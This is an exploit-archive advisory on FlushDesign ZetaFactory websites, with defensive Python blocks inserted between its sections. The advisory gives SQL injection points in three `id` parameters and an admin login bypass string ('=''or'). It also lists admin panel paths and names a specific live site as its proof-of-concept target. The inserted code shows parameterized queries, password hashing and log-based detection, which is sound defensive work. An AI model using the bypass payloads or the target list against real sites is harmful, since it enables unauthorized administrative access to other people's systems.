
FlushDesign ZetaFactory Italy SQL Injection and Authentication

Author: KingSkrupellos , Published: 08-10-2018
# Exploit Title : FlushDesign ZetaFactory Italy SQL Injection and Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : flushdesign.it ~ zetafactory.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : N/A
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# SQL Injection Exploit :

/news/readnews.php?id=[SQL Injection]

/productions/productionsview.php?id=[SQL Injection]

/artists/bands_view.php?id=[SQL Injection]

# Admin Login Bypass [ Authentication Bypass ] Exploit :

Admin Panel Login Path : /admin/

Admin Username : '=''or'

Admin Password : '=''or'
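The findings above reduce to two missing controls: the `id` parameter reaches the SQL text unchecked, and the admin login concatenates the submitted username and password into the query. The block below is an added illustration, not the vendor's or the advisory author's code: it validates `id` as a plain positive integer, binds every user-supplied value as a query parameter, and verifies the admin password against a salted PBKDF2 hash. The table names, the sample rows and the `example-admin-password` credential are constructed for the demonstration; SQLite stands in for the MySQL backend the error message points to.

```python
"""
Defensive counterpart to the findings above: strict validation for the
numeric ``id`` parameters and parameterized queries for both the content
lookup and the admin login. Schema, table names and sample rows are
constructed for this illustration; they are not the vendor's code.
"""
import hashlib
import hmac
import secrets
import sqlite3
from typing import Optional, Tuple


def parse_record_id(raw: str) -> int:
    """Accept only a plain positive integer for ?id=; reject anything else
    (empty string, signs, spaces, quotes, letters) before it reaches SQL."""
    if not raw.isdigit():
        raise ValueError("id must be a positive integer")
    value = int(raw)
    if value <= 0:
        raise ValueError("id must be a positive integer")
    return value


def fetch_news(conn: sqlite3.Connection, raw_id: str):
    """readnews.php-style lookup, parameterized: the id travels as a bound
    value, never as part of the SQL string."""
    news_id = parse_record_id(raw_id)
    row = conn.execute(
        "SELECT id, title FROM news WHERE id = ?", (news_id,)
    ).fetchone()
    return row  # None when no such record; no failed-query warning to leak


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; returns (salt, digest)."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest


def check_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Admin login: look the user up by bound parameter, then compare the
    password hash in constant time. A quoted or operator-laden username is
    just a string that matches no row, so the bypass above gets False."""
    row = conn.execute(
        "SELECT salt, pw_hash FROM admins WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)


def build_demo_db() -> sqlite3.Connection:
    """In-memory database populated with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'Welcome'), (2, 'Tour dates')")
    conn.execute(
        "CREATE TABLE admins (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)"
    )
    salt, digest = hash_password("example-admin-password")  # constructed credential
    conn.execute("INSERT INTO admins VALUES (?, ?, ?)", ("admin", salt, digest))
    return conn


if __name__ == "__main__":
    db = build_demo_db()
    print("news id=1:", fetch_news(db, "1"))
    print("valid login:", check_login(db, "admin", "example-admin-password"))
    print("bypass string as username/password:", check_login(db, "'=''or'", "'=''or'"))
```

The same `parse_record_id` check applies to all three `id` endpoints listed above; in the PHP original the equivalent fix is to cast or validate `$_GET['id']` and move to `mysqli`/PDO prepared statements, since the `mysql_*` functions the error message names have no parameter binding at all.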

# Useable Admin Control Panel URL Links =>

/admin/home.php

/admin/banner.php
/admin/banner/thumbs/.....

/admin/bio.php
/admin/news.php

/admin/bands.php
/admin/bands/thumbs/....

/admin/news.php
/admin/works.php
/admin/audio.php
/admin/video.php
/admin/download.php
/admin/links.php
/admin/contacts.php
/admin/photos.php

#################################################################################################

# Example Vulnerable Site => dysfunctionproductions.com => [ Proof of Concept ] => archive.is/J86XL

# SQL Database Error =>

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in
/web/htdocs/www.dysfunctionproductions.com/home/news/readnews.php on line 40
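That warning is the observable side of a query that returned `false`, and it is also what a defender can hunt for. The following block is an added detection example, not part of the advisory or the vendor's product: it scans web-server access log lines for requests to the three affected scripts whose `id` value is not a plain positive integer, and scans PHP error log lines for the "boolean given" warning that a failed `mysql_fetch_*()` call produces. The combined-log regex, the sample log lines, the client addresses and the `example.invalid` path are all constructed for the demonstration.

```python
"""
Detection helpers for the issues described above (added example, not the
vendor's or the advisory author's code). Two signals are covered: a
non-numeric ``id`` sent to an affected script, and the PHP warning emitted
when a failed query result is passed to mysql_fetch_*(). Sample log lines
below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Scripts named in the advisory as taking an injectable ?id= parameter
AFFECTED_SCRIPTS = {
    "/news/readnews.php",
    "/productions/productionsview.php",
    "/artists/bands_view.php",
}

# Apache/nginx "combined" format: client, timestamp, request line, status, size
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# The warning text PHP prints when a false query result reaches mysql_fetch_*()
FAILED_QUERY_RE = re.compile(
    r"mysql_fetch_(?:row|assoc|array)\(\) expects parameter 1 to be resource, boolean given"
)


def scan_access_log(lines):
    """Return (client, script, raw_id) for every request to an affected
    script whose id parameter is not a plain positive integer."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path not in AFFECTED_SCRIPTS:
            continue
        # keep_blank_values so an empty id= is still reported
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not raw.isdigit():
                hits.append((m.group("client"), url.path, raw))
    return hits


def scan_php_error_log(lines):
    """Return the script path named in each failed-query warning; a burst of
    these against one script is worth correlating with the access log."""
    hits = []
    for line in lines:
        if FAILED_QUERY_RE.search(line):
            loc = re.search(r" in (\S+) on line (\d+)", line)
            hits.append(loc.group(1) if loc else line.strip())
    return hits


# Constructed sample lines; %27 is a URL-encoded single quote
SAMPLE_ACCESS = [
    '203.0.113.5 - - [04/Oct/2018:10:00:01 +0200] "GET /news/readnews.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Oct/2018:10:00:09 +0200] "GET /news/readnews.php?id=12%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [04/Oct/2018:10:01:15 +0200] "GET /artists/bands_view.php?id=3 HTTP/1.1" 200 4011',
    '198.51.100.7 - - [04/Oct/2018:10:01:20 +0200] "GET /productions/productionsview.php?id= HTTP/1.1" 200 790',
    '192.0.2.9 - - [04/Oct/2018:10:02:00 +0200] "GET /index.php?id=abc HTTP/1.1" 200 3000',
]

SAMPLE_PHP_ERRORS = [
    "[04-Oct-2018 10:00:09 Europe/Rome] PHP Warning:  mysql_fetch_row() expects parameter 1 "
    "to be resource, boolean given in /web/htdocs/example.invalid/home/news/readnews.php on line 40",
    "[04-Oct-2018 10:03:00 Europe/Rome] PHP Notice:  Undefined index: page "
    "in /web/htdocs/example.invalid/home/index.php on line 12",
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS):
        print("suspicious id:", hit)
    for hit in scan_php_error_log(SAMPLE_PHP_ERRORS):
        print("failed query in:", hit)
```

Pairing the two scans by timestamp (the `ts` group in `ACCESS_RE`) turns a noisy warning into an actionable event: an odd `id` value followed within a second by a failed-query warning from the same script is the pattern to alert on. Note that the `/admin/` login bypass is a POST and its body is not in the access log, so that path needs application-side logging of failed and successful logins.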

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
